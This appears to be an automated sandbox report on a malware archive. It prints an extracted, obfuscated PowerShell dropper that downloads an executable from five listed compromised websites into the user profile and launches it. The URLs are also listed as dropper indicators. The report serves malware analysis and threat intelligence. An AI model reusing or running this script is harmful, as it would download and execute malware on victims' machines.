Malware Samples(2).zip

General
Target

Malware Samples(2).zip

Filesize

N/A

Completed

01-01-2020 05:09

Score
10 /10
MD5

N/A

SHA1

N/A

SHA256

560d99887286ea550542c684b208ab356394e22d45571c64765653543fbf1dd3

Malware Config

Extracted

Language ps1
Source $Oqojrpmkdzlg='Geusckfeislh';$Sgynadtdzi = '218';$Fsncjfbnouvcw='Vrtgwojhgrqk';$Isveftscymko=$env:userprofile+'\'+$Sgynadtdzi+'.exe';$Ykjzmxgyekpf='Xhhivpxtn';$Pdzvevbhes=.('new-obj'+'e'+'ct') nEt.WebcLiEnT;$Mvcblrhkzozg='https://lilikhendarwati.com/wp-admin/JbdTQoQQ/*http://www.zhangboo.com/wp-admin/lwhcvV/*http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/*https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/*http://apolina.pl/engl/1tuh6ul-gakf89-994/'."s`pLIT"('*');$Jvkhktvtsqj='Klmwnirr';foreach($Mzmqbzjug in $Mvcblrhkzozg){try{$Pdzvevbhes."do`Wnl`OAdfILE"($Mzmqbzjug, $Isveftscymko);$Kykhosxe='Jccvrurtmy';If ((&('Get-'+'I'+'tem') $Isveftscymko)."lEn`Gth" -ge 31454) {[Diagnostics.Process]::"STa`RT"($Isveftscymko);$Dykdageiykrai='Gaulnathjq';break;$Rxfapwcgiepw='Clskviufmldd'}}catch{}}$Kramunnkskce='Dblxnvyhpyvx'
URLs
exe.dropper

https://lilikhendarwati.com/wp-admin/JbdTQoQQ/

exe.dropper

http://www.zhangboo.com/wp-admin/lwhcvV/

exe.dropper

http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/

exe.dropper

https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/

exe.dropper

http://apolina.pl/engl/1tuh6ul-gakf89-994/

Signatures

Filter: None

    Processes
    Network
    Replay Monitor
    00:00 00:00
    Downloads
    • memory/844-0-0x0000000006100000-0x0000000006104000-memory.dmp

    • memory/844-1-0x00000000061F9000-0x00000000061FD000-memory.dmp

    • memory/844-2-0x00000000061F9000-0x00000000061FD000-memory.dmp

    • memory/844-3-0x00000000095A0000-0x00000000095A4000-memory.dmp